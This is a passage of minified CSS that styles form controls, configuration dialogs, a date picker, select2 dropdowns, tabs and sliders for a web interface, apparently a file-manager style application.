input[type="radio"].kui-radio.size-big:before{ line-height:24px;} input[type="radio"].kui-radio.size-bigx{ font-size:19.2px;height:32px;width:32px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-bigx:before{ line-height:30px;} input[type="radio"].kui-radio:checked{ background:#63acff;border-color:#63acff !important;} input[type="radio"].kui-radio:hover, input[type="radio"].kui-radio:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="radio"].kui-radio.red:checked{ background:#ff5722;border-color:#ff5722 !important;} input[type="radio"].kui-radio.red:hover, input[type="radio"].kui-radio.red:focus{ border-color:#ff5722 !important;box-shadow:0 0 0 1px #ff5722 !important;} input[type="radio"].kui-radio.blue:checked{ background:#63acff;border-color:#63acff !important;} input[type="radio"].kui-radio.blue:hover, input[type="radio"].kui-radio.blue:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="radio"].kui-radio.green:checked{ background:#64bd63;border-color:#64bd63 !important;} input[type="radio"].kui-radio.green:hover, input[type="radio"].kui-radio.green:focus{ border-color:#64bd63 !important;box-shadow:0 0 0 1px #64bd63 !important;} input[type="radio"].kui-radio.yellow:checked{ background:#ffc107;border-color:#ffc107 !important;} input[type="radio"].kui-radio.yellow:hover, input[type="radio"].kui-radio.yellow:focus{ border-color:#ffc107 !important;box-shadow:0 0 0 1px #ffc107 !important;} input[type="radio"].kui-radio.grey:checked{ background:#aaa;border-color:#aaa !important;} input[type="radio"].kui-radio.grey:hover, input[type="radio"].kui-radio.grey:focus{ border-color:#aaa !important;box-shadow:0 0 0 1px #aaa !important;} input[type="radio"].kui-radio.black:checked{ background:#444;border-color:#444 !important;} input[type="radio"].kui-radio.black:hover, input[type="radio"].kui-radio.black:focus{ border-color:#444 !important;box-shadow:0 0 0 1px #444 !important;}}.form-box{color:#444;}.form-box a{color:#5d9cec;text-decoration:none;}.form-box a:hover{color:#4a89dc;}.form-box .panel-body{position:relative;}.form-box .panel-body .line,.form-box .panel-body hr{border:none;height:1px;overflow:hidden;background:#ddd;margin:10px 30px;height:2px;background:transparent url("../../../images/common/line.png") repeat-x 0 0;}.form-box .panel-body h1,.form-box .panel-body h2,.form-box .panel-body h3,.form-box .panel-body h4,.form-box .panel-body h5{margin:0.6em 1em 0.5em 30px;padding-bottom:0.4em;border-bottom:1px solid #ddd;}.form-box.config-box .form-header{height:40px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#efefef', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-o-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);-pie-background:linear-gradient(to 60deg,#efefef 0%,#f5f7fa 100%);border-bottom:1px solid #ddd;}.form-box.config-box .form-header .modal-title{height:40px;line-height:40px;padding-left:30px;font-size:14px;}.form-box.config-box .form-header .modal-title img,.form-box.config-box .form-header .modal-title .x-item-file{height:26px;width:26px;line-height:26px;text-align:center;border-radius:15%;display:inline-block;margin-right:10px;padding:0;color:#fff;position:relative;top:8px;}.form-box.config-box .form-header .modal-title img.x-font-icon,.form-box.config-box .form-header .modal-title .x-item-file.x-font-icon{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to 164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));}.form-box.config-box .form-header .modal-title img.font-icon-words,.form-box.config-box .form-header .modal-title .x-item-file.font-icon-words{font-size:10px;}.form-box.config-box .form-header .modal-title i{font-style:normal;}.form-box.config-box .form-header .modal-title img,.form-box.config-box .form-header .modal-title .x-font-icon{top:0px;}.form-box.config-box .panel-body{overflow:auto;border-radius:4px;padding:20px 0;position:absolute;left:0;right:0;top:42px;bottom:71px;margin:0;border:none;background:#fff;}.form-box .form-row{padding:3px 30px;padding-right:5px;width:auto;margin:1px 0;}.form-box .form-row:after{clear:both;}.form-box .form-row.form-group{margin:0;}.form-box .form-row label{margin-right:10px;display:inline;}.form-box .form-row input[type='radio']{display:inline-block;margin-right:10px;}.form-box .form-row input[type='text'],.form-box .form-row input[type='password'],.form-box .form-row input[type='number']{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;display:inline-block;height:28px;width:260px;color:#444;border-radius:4px;padding-left:0.5em;margin-right:10px;}.form-box .form-row input[type='text']:focus,.form-box .form-row input[type='password']:focus,.form-box .form-row input[type='number']:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.form-box .form-row input[type='text']:focus,.form-box .form-row input[type='password']:focus,.form-box .form-row input[type='number']:focus{box-shadow:0 0 0 3px rgba(117,161,240,0.33);}.form-box .form-row select{min-width:268px;}.form-box .form-row textarea{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;width:251px;height:100px;margin-right:10px;border-radius:2px;padding:8px;transition:none;}.form-box .form-row textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.form-box .form-row textarea:focus{box-shadow:0 0 0 3px rgba(117,161,240,0.33);}.form-box .form-row .setting-title{height:30px;line-height:30px;width:140px;margin-right:20px;padding-top:5px;padding-left:5px;float:left;position:relative;text-align:right;}.form-box .form-row .setting-title .require{color:#ff5722;font-size:20px;position:absolute;margin-top:4px;padding:0 0 0 5px;}.form-box .form-row .setting-content{float:left;position:relative;width:70%;padding:5px;border-radius:4px;border:1px solid transparent;}.form-box .form-row .setting-content input.has-btn-right{width:220px;padding-right:40px;}.form-box .form-row .setting-content .input-btn-right{padding:0;margin-left:-50px;position:absolute;width:35px;height:30px;line-height:30px;border-radius:0 4px 4px 0;}.form-box .form-row .setting-content .input-btn-right .font-icon{font-size:14px;width:20px;padding:0 !important;}.form-box .form-row .setting-content input.has-btn-right:focus + .input-btn-right{border-color:#75a1f0;border-left-color:#c7d5ef;}.form-box .form-row .font-icon{padding:0;}.form-box .form-row .user-select{margin:0.5em 0;}.form-box .form-row.form-userSelect .setting-content{background:#f8fcff;padding:10px 5px;margin-top:-5px;}.form-box .form-row.form-userSelect .desc{margin-top:10px;}.form-box .form-row.error .setting-content{background:#ffefed;border-color:#ffb3ae;}.form-box .form-row.form-color .color-picker-view i{width:20px;height:20px;margin-top:5px;box-shadow:0 0 4px #666;display:inline-block;border-radius:2px;}.form-box .form-row .select2-container{width:270px !important;}.form-box .form-row .slider.slider-horizontal{width:260px;margin-right:20px;height:30px;}.form-box .form-row .slider .tooltip{pointer-events:none;}.form-box .form-row .desc,.form-box .form-row .setting-content i{color:#9ba3af;font-style:normal;}.form-box .ztree.group-list-tree a{border:none;padding-left:3px;}.form-box .ztree.group-list-tree a:hover{border:none;}.form-box .ztree.group-list-tree li a.curSelectedNode{color:#fff;}.form-box .ztree.group-list-tree .sub-menu{float:right;display:none;line-height:20px;padding-right:7px;font-size:1.15em;color:#ddd;}.form-box .ztree.group-list-tree .hover .sub-menu{display:inline-block;color:#666;}.form-box .ztree.group-list-tree .curSelectedNode .sub-menu,.form-box .ztree.group-list-tree .hover.curSelectedNode .sub-menu{display:inline-block;color:#fff;}.form-box-title-left .form-row .setting-title{text-align:left;}body .colorpicker{z-index:99999;}body .dialog-plugin-config.dialog-no-title .aui-outer{box-shadow:0 6px 40px 0 rgba(16,17,18,0.3);border:1px solid #ccc !important;border-radius:4px;overflow:hidden;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close{color:#bbb;color:rgba(0,0,0,0.2);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:active,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:active,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:active{background:rgba(0,0,0,0.12);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:active.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:active.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:active.aui-close{color:#fff;background:#e81123;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-title{height:40px;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons{padding-right:20px;height:40px;border-top:1px solid #ddd;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f2f4f7', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-o-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);-pie-background:linear-gradient(to left,#f2f4f7 0%,#f5f7fa 100%);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons button{margin-top:5px;margin-left:20px;padding:0 2em;height:30px;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons .btn-config-reset{background:none;border:none;box-shadow:none;padding:0px 10px;color:#bbb;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons .btn-config-reset:hover{color:#2196F3;background:#eaf5ff;}div.xdsoft_datetimepicker{border-top:2px solid #39f;padding:0;height:250px;color:#666;}div.xdsoft_datetimepicker .xdsoft_label,div.xdsoft_datetimepicker .xdsoft_month{text-align:center;font-weight:400;}div.xdsoft_datetimepicker .xdsoft_label:hover,div.xdsoft_datetimepicker .xdsoft_month:hover{text-decoration:none;background:#e6f2ff;}div.xdsoft_datetimepicker .xdsoft_label:hover span,div.xdsoft_datetimepicker .xdsoft_month:hover span{color:#20a0ff;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select{box-shadow:0px 2px 10px rgba(0,0,0,0.2);border:1px solid rgba(0,0,0,0.1);max-height:300px;height:200px;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select.xdsoft_monthselect,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select.xdsoft_monthselect{right:0px;width:90px;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select.xdsoft_yearselect,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select.xdsoft_yearselect{right:0px;width:56px;}div.xdsoft_datetimepicker .xdsoft_scrollbar >.xdsoft_scroller{background:rgba(0,0,0,0.3) !important;}div.xdsoft_datetimepicker .xdsoft_calendar td,div.xdsoft_datetimepicker .xdsoft_calendar th{height:30px;text-align:center;background:none;border:none;}div.xdsoft_datetimepicker .xdsoft_calendar td div,div.xdsoft_datetimepicker .xdsoft_calendar th div{padding:0;}div.xdsoft_datetimepicker .xdsoft_calendar th{background:#eee;color:#444;font-weight:400;}div.xdsoft_datetimepicker .xdsoft_datepicker{width:220px;margin-right:10px;}div.xdsoft_datetimepicker .xdsoft_datepicker.active+.xdsoft_timepicker{margin:0;}div.xdsoft_datetimepicker .xdsoft_timepicker{width:70px;border-left:1px solid #ddd;background:#fbfdff;margin:0;margin-left:-1px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_prev,div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_next{margin-left:20px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_time_box{border:none;height:203px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_time_box >div >div{background:none;border:none;}span.select2-container--default .select2-dropdown,span.select2-container--classic .select2-dropdown{box-shadow:0 2px 10px rgba(0,0,0,0.2);border:1px solid #ccc;overflow:hidden;}span.select2-container--default .select2-dropdown .select2-search__field,span.select2-container--classic .select2-dropdown .select2-search__field{border:1px solid #ccc;}span.select2-container--default .select2-selection--multiple,span.select2-container--default .select2-selection--single,span.select2-container--classic .select2-selection--multiple,span.select2-container--classic .select2-selection--single{border:1px solid #ccc;border-radius:4px;outline:none;min-height:32px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice,span.select2-container--default .select2-selection--single .select2-selection__choice,span.select2-container--classic .select2-selection--multiple .select2-selection__choice,span.select2-container--classic .select2-selection--single .select2-selection__choice{background-color:#edf5ff;color:#3a96ff;border-color:#badaff;height:24px;line-height:22px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove,span.select2-container--default .select2-selection--single .select2-selection__choice .select2-selection__choice__remove,span.select2-container--classic .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove,span.select2-container--classic .select2-selection--single .select2-selection__choice .select2-selection__choice__remove{float:right;font-size:15px;color:#3a96ff;width:20px;height:22px;line-height:18px;text-align:center;margin-right:-2px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--default .select2-selection--single .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--classic .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--classic .select2-selection--single .select2-selection__choice .select2-selection__choice__remove:hover{color:#0063d3;}span.select2-container--default.select2-container--focus .select2-selection--multiple,span.select2-container--default.select2-container--focus .select2-selection--single,span.select2-container--classic.select2-container--focus .select2-selection--multiple,span.select2-container--classic.select2-container--focus .select2-selection--single{border:1px solid #3a96ff;}span.select2-container--default .select2-selection--single,span.select2-container--classic .select2-selection--single{background:#f8f8f8 url("../../../images/common//bg.gif") 0px -10px repeat-x;}span.select2-container--default .select2-selection--single .select2-selection__arrow,span.select2-container--classic .select2-selection--single .select2-selection__arrow{height:30px;width:26px;}span.select2-container--default .select2-selection--multiple ul.select2-selection__rendered:after,span.select2-container--classic .select2-selection--multiple ul.select2-selection__rendered:after{content:"";width:23px;height:50%;display:block;color:#aaa;position:absolute;right:1px;top:50%;margin-top:-7px;text-align:center;font-family:FontAwesome;}span.select2-container--default .select2-selection--multiple .select2-search--inline,span.select2-container--classic .select2-selection--multiple .select2-search--inline{height:29px;line-height:23px;}span.select2-container--default .select2-results.group-list-content>.select2-results__options,span.select2-container--classic .select2-results.group-list-content>.select2-results__options{z-index:100;width:100%;height:250px;max-height:250px;}span.select2-container--default .select2-results__option,span.select2-container--classic .select2-results__option{position:relative;}span.select2-container--default .select2-search--inline .select2-search__field,span.select2-container--classic .select2-search--inline .select2-search__field{padding-top:1px;}span.select2-container--default .select2-results__option[aria-selected=true],span.select2-container--default .select2-results__option[aria-selected=true].select2-results__option--highlighted,span.select2-container--classic .select2-results__option[aria-selected=true],span.select2-container--classic .select2-results__option[aria-selected=true].select2-results__option--highlighted{background:#edf5ff;color:#3a96ff;}span.select2-container--default .select2-results__option[aria-selected=true]:after,span.select2-container--classic .select2-results__option[aria-selected=true]:after{content:"\f00c";color:#3a96ff;position:absolute;right:10px;font-size:14px;font-family:FontAwesome;}span.select2-container--default .select2-results__option--highlighted[aria-selected],span.select2-container--classic .select2-results__option--highlighted[aria-selected]{background-color:#eee;color:#444;}span.select2-container--default.select2-container--open.select2-container--above .select2-selection--single,span.select2-container--classic.select2-container--open.select2-container--above .select2-selection--single{border-top:1px solid transparent;}span.select2-container--default.select2-container--open.select2-container--below .select2-selection--multiple,span.select2-container--classic.select2-container--open.select2-container--below .select2-selection--multiple{border-bottom:1px solid transparent;}span.select2-container--default.select2-container--open .select2-dropdown.select2-dropdown--below,span.select2-container--classic.select2-container--open .select2-dropdown.select2-dropdown--below{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);margin-top:-1px;}span.select2-container--default.select2-container--open .select2-dropdown.select2-dropdown--above,span.select2-container--classic.select2-container--open .select2-dropdown.select2-dropdown--above{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);margin-top:1px;box-shadow:0 -2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);}span.select2-container--default.select2-container--open .select2-selection--multiple,span.select2-container--default.select2-container--open .select2-selection--single,span.select2-container--classic.select2-container--open .select2-selection--multiple,span.select2-container--classic.select2-container--open .select2-selection--single{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);}span.select2-container--default .ztree,span.select2-container--classic .ztree{padding:0;}span.select2-container--default .ztree li a,span.select2-container--classic .ztree li a{padding-left:0;height:26px;line-height:26px;border:none;margin:0;border-radius:0;}span.select2-container--default .ztree li a.this,span.select2-container--classic .ztree li a.this{background:#edf5ff;border:none;height:26px;line-height:26px;}span.select2-container--default .ztree li a.this:hover,span.select2-container--classic .ztree li a.this:hover{color:#3a96ff;}span.select2-container--default .ztree li a:hover,span.select2-container--classic .ztree li a:hover{border:none;margin:0;border-radius:0;color:#3a96ff;}span.select2-container--default .ztree .check-icon,span.select2-container--classic .ztree .check-icon{float:right;color:#fff;font-size:12px;text-align:center;width:15px;height:15px;line-height:15px;padding:0;margin-top:5px;margin-right:5px;-webkit-transition:all .1s ease-in-out;-moz-transition:all .1s ease-in-out;-o-transition:all .1s ease-in-out;-ms-transition:all .1s ease-in-out;transition:all .1s ease-in-out;}span.select2-container--default .ztree .check-icon:before,span.select2-container--classic .ztree .check-icon:before{content:"\f";}span.select2-container--default .ztree a.this .check-icon:before,span.select2-container--classic .ztree a.this .check-icon:before{content:"\f00c";color:#3a96ff;}body .select2-container{width:270px;margin-right:10px;}.tab-group{text-align:center;margin-bottom:-12px;}.tab-group .tab-item{background:#fff;text-align:left;display:inline-block;margin-left:-5px;border:1px solid #ccc;border-bottom-color:#a6a6a6;border-right-color:#b8b8b8;}.tab-group .tab-item:hover{background:#e6e6e6;}.tab-group .tab-item:first-child{border-top-left-radius:3px;border-bottom-left-radius:3px;}.tab-group .tab-item:last-child{border-top-right-radius:3px;border-bottom-right-radius:3px;}.tab-group .tab-item a{text-decoration:none;color:#444;padding:0 15px;height:24px;display:inline-block;line-height:24px;}.tab-group .tab-item.active a{color:#fff;}.tab-group .tab-item.active,.tab-group .tab-item.active:hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#6eb4f7', endColorstr='#1a82fb');background-image:-webkit-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-moz-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-o-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-ms-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);-pie-background:linear-gradient(to to bottom,#6eb4f7 0,#1a82fb 100%);color:#fff;z-index:10;border-color:#3f87dc;border-top-color:#4396e6;border-color:#388df8 #388df8 #0866dc transparent;}.tab-group .tab-item.active:hover,.tab-group .tab-item.active:active{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#3e9bf4', endColorstr='#0469de');background-image:-webkit-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-moz-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-o-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-ms-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);-pie-background:linear-gradient(to to bottom,#3e9bf4 0,#0469de 100%);}.tab-group .tab-item:last-child.active,.tab-group .tab-item.active + .tab-item{border-left-color:transparent;}body .slider .slider-track{background:#ddd;box-shadow:none;}body .slider.slider-horizontal .slider-track{height:6px;}body .slider .slider-selection{transition:background-color .3s ease;background:#2196f3;box-shadow:none;}body .slider .slider-handle{margin-left:-7px;margin-top:-6px;width:14px;height:14px;cursor:pointer;border-radius:50%;border:2px solid #88c7f4;background:#fff;transition:border-color .3s ease, transform .3s cubic-bezier(.18,.89,.32,1.28);}body .slider .slider-handle.round:hover{box-shadow:0 0 0 6px rgba(150,219,250,0.7);}body .slider .tooltip{transition:all 0.168s cubic-bezier(0,0.84,0.58,1);}body .slider .tooltip.top{margin-top:-43px;}body .slider .tooltip.bottom{margin-top:20px;}body .slider .tooltip.top .tooltip-arrow{border-top-color:rgba(0,0,0,0.7);}body .slider .tooltip.bottom .tooltip-arrow{border-bottom-color:rgba(0,0,0,0.7);}body .slider .tooltip-inner{background-color:rgba(0,0,0,0.7);box-shadow:0 1px 5px rgba(0,0,0,0.2);padding:8px 15px;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .aui-outer .aui-buttons{box-shadow:0 0 20px #ddd;border-top:1px solid #eee;height:45px;padding-top:5px;border-top:none;background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .form-box.config-box .panel-body{left:130px;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group{position:absolute;left:0;padding:0;width:140px;height:100%;padding-top:20px;z-index:99999;background:#f5f7fa;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item{display:block;border:none;background:none;border-radius:0;font-size:14px;-webkit-transition:0.16s all;-moz-transition:0.16s all;-o-transition:0.16s all;-ms-transition:0.16s all;transition:0.16s all;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:hover{background:#eee;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:first-child,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:last-child{border-radius:0;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item a{padding:0 20px 0 15px;display:block;height:40px;line-height:40px;text-align:right;white-space:nowrap;text-overflow:ellipsis;overflow:hidden;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active a{color:#2196F3;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover{background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:active{background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover a,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:active a{color:#2196F3;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:last-child.active,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active + .tab-item{border-left-color:transparent;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header{height:40px;border-bottom:1px solid #adabad;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#d3d1d3', endColorstr='#e7e5e7');background-image:-webkit-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-moz-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-o-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-ms-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);-pie-background:linear-gradient(to bottom,#d3d1d3 0%,#e7e5e7 100%);}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title{height:40px;line-height:40px;padding-left:20px;font-size:12px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title img,body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title .x-item-file{height:22px;width:22px;top:8px;margin-right:4px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row .setting-title{text-align:right;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row.form-userSelect .setting-content{background:#f4f4f4;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row.error .setting-content{background:#ffefed;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body{background:#eee;border:1px solid #e3e3e3;margin:20px;top:60px;bottom:30px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body .line,body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body hr{border-color:#ddd;}body .dialog-plugin-config.dialog-form-style-mac .tab-group{position:absolute;margin-top:25px;width:100%;z-index:999;}body .dialog-plugin-config.dialog-form-style-mac .aui-content{background:#f9f9f9;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-title{height:40px;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-buttons{padding-right:20px;height:30px;border-top:1px solid #ddd;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f2f4f7', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-o-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);-pie-background:linear-gradient(to left,#f2f4f7 0%,#f5f7fa 100%);background:#f9f9f9;border:none;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-buttons button{margin-top:1px;margin-left:20px;padding:0 2em;height:25px;}.message-box{position:absolute;top:15%;left:0px;z-index:88;background:#63acff;color:#fff;opacity:0.7;filter:alpha(opacity=70);-webkit-border-radius:1px;-moz-border-radius:1px;border-radius:1px;-webkit-box-shadow:0 10px 60px rgba(0,0,0,0.6);-moz-box-shadow:0 10px 60px rgba(0,0,0,0.6);box-shadow:0 10px 60px rgba(0,0,0,0.6);display:none;}.message-box .content{padding:10px 30px;line-height:20px;width:auto;}.aui-outer{text-align:left;position:relative;}.aui-mask{position:absolute;width:100%;height:100%;background:#fff;opacity:0.01;filter:alpha(opacity=1);}.aui-loading{height:100%;width:100%;overflow:hidden;opacity:0.7;filter:alpha(opacity=70);position:absolute;left:0;top:40px;z-index:9999;text-align:center;text-indent:-999em;}.aui-loading span{width:80px;height:80px;border-radius:6px;background:#fff url("../../../images/common/dialog/dialog_loading.gif") no-repeat center center;position:absolute;left:50%;top:50%;margin-left:-40px;margin-top:-40px;}table.aui-border,table.aui-dialog{width:100%;border:0;margin:0;border-collapse:collapse;}.aui-nw,.aui-n,.aui-ne,.aui-w,.aui-c,.aui-e,.aui-sw,.aui-s,.aui-se,.aui-header,.aui-td-icon,.aui-main,.aui-footer{padding:0;}.aui-header,.aui-buttons button{font:12px/1.11;}.aui-title{overflow:hidden;text-overflow:ellipsis;font-size:1em;}.aui-title img,.aui-title .x-item-file{width:20px;margin-right:5px;border-radius:4px;cursor:pointer;pointer-events:all;}.aui-title img:hover,.aui-title .x-item-file:hover{transform:scale(1.1,1.1);}.aui-state-no-title .aui-title{display:none;}.aui-main{font-size:1.1em;text-align:center;background:#FFF;min-width:9em;min-width:0 \9;visibility:auto;}.aui-content{text-align:left;color:#666;border:none 0;}.aui-content{width:100%;height:100%;}.aui-content.aui-state-full{display:block;width:100%;margin:0;padding:0 !important;height:100%;}.aui-icon{vertical-align:middle;background:#fff;}.aui-icon div{width:48px;height:48px;margin:10px 0 10px 10px;background-position:center center;background-repeat:no-repeat;}.aui-buttons{padding:10px 8px;text-align:right;white-space:nowrap;background-color:#F6F6F6;border-top:solid 1px #DADEE5;}.aui-buttons button{margin-left:15px;padding:3px 20px;height:25px;cursor:pointer;display:inline-block;text-align:center;line-height:1;overflow:visible;color:#000000;border:none;background:#aaa;color:#fff;}.aui-buttons button:focus{outline:none 0;}.aui-buttons button:hover{background:#c4c4c4;}.aui-buttons button:active{background:#777777;}.aui-buttons button[disabled]{cursor:default;color:#919191;background:#aaa;opacity:0.5;filter:alpha(opacity=50);}.aui-buttons button::-moz-focus-inner{border:0;padding:0;margin:0;}.aui-buttons button.aui-state-highlight{color:#FFF;background:#63acff;}.aui-buttons button.aui-state-highlight:hover{color:#FFF;background:#96c7ff;}.aui-buttons 